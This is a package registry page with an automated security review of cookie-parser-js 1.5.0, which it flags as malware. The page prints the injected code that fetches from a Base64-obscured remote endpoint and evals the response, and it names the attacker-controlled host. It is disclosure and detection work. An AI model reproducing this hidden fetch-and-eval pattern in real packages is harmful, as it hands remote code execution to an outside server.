registry  /  cookie-parser-js  /  1.5.0

cookie-parser-js@1.5.0

Parse HTTP request cookies

AI Security Review

scanned 2h ago · by lpm-firewall-ai

The package performs remote code execution during middleware initialization. It fetches JSON from an external Vercel endpoint and evals the response content.

Static reason
One or more suspicious static signals were detected.
Trigger
Runtime call to exported cookieParser(secret, options) by an application
Impact
Remote server can execute arbitrary JavaScript in the consuming Node.js process
Mechanism
remote JSON fetch followed by eval(r.content)
Attack narrative
When a consuming app calls cookieParser() to create middleware, index.js makes an HTTPS GET request to https://cookie-api-two.vercel.app/. After receiving the response, it parses the body as JSON and passes r.content directly to eval, allowing the remote endpoint to supply arbitrary code for execution inside the application process.
Rationale
Direct source inspection confirms a hidden remote fetch plus eval path unrelated to cookie parsing. This is concrete runtime remote code execution controlled by an external endpoint, so the package should be blocked.
Evidence
index.jspackage.json
Network endpoints1
cookie-api-two.vercel.app/

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js:41-42 requires https and requests a Base64-obscured URL from inside cookieParser().
  • index.js:52-54 parses the remote JSON response and evals r.content.
  • Decoded endpoint is https://cookie-api-two.vercel.app/.
  • The network/RCE code runs when an application initializes the exported middleware, not as a documented cookie parsing feature.
Evidence against
  • package.json has no preinstall/install/postinstall lifecycle scripts.
  • No source evidence of local credential/file harvesting or filesystem writes.
  • Normal cookie parsing helpers and dependencies are present around the injected block.
Behavioral surface
Source
EvalNetwork
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 3.88 KB of source

Source & flagged code

2 flagged · loading source
index.jsView file
41const https = require('https'); L42: https.get(atob('[redacted]'), (res) => { L43: let data = '';
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

index.jsView on unpkg · L41
53const r = JSON.parse(data); L54: eval(r.content) L55: } catch (e) {
Low
Eval

Package source references a known benign dynamic code generation pattern.

index.jsView on unpkg · L53

Findings

1 High1 Medium3 Low
HighBase64 Obscured Urlindex.js
MediumNetwork
LowScripts Present
LowEvalindex.js
LowHigh Entropy Strings